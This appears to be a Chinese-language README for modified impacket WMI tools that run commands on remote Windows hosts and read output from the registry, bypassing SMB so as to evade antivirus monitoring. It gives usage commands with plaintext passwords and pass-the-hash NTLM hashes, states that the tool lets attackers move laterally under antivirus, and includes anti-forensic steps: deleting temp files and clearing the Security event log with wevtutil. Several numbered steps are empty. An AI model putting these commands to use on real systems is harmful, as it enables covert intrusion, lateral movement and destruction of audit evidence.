
impacket wmiexec.py、wmipersist.py 的修改版本。从注册表获取输出(数据、响应),不需要 SMB 连接,但我的代码写得很糟糕 :(
在原始 wmiexec.py 中,它通过 SMB 连接(端口 445、139)获取响应。不幸的是,一些杀毒软件将这些端口视为高风险并进行监控。
在这种情况下,我放弃了 SMB 连接功能,使用其他方法来执行命令。
键:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration
名称:EnableAt
类型:REG_DWORD
值:1
wmipersist-wip.py (强烈推荐,!!!仅适用于 impacket v0.9.24!!!):这是 WMIHACKER 的 Python 版本,我从中提取了 vbs 模板。攻击者可以在运行杀毒软件的情况下安全地进行横向移动。
wmiexec-regOut.py:只是一个简单的 Win32_Process.create 方法示例。
第 1 步:
第 2 步:
第 3 步:
第 4 步:
第 5 步:
第 1 步:
第 2 步:
第 3 步:
通常,您只需要安装官方 impacket。
使用明文密码
python3 wmiexec-reg.py administrator:[email protected] 'whoami'

使用 NTLM 哈希
python3 wmiexec-reg.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 [email protected] 'whoami'

使用明文密码(无输出)
python3 wmipersist-wip.py administrator:[email protected] 'command'

使用 NTLM 哈希
python3 wmipersist-wip.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 [email protected] 'whoami'

运行命令输出后,不要忘记清理临时目录。
命令:del /q /f /s C:\windows\temp\*

命令中包含双引号。
在单引号内使用双引号 wevtutil cl '"security"'

带输出
python3 wmipersist-wip.py administrator:[email protected] "whoami /priv" -with-output
python3 wmipersist-wip.py [email protected] "whoami /priv" -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 -with-output

在火绒杀毒软件下(使用 WMIHACKER VBS 模板!!!)
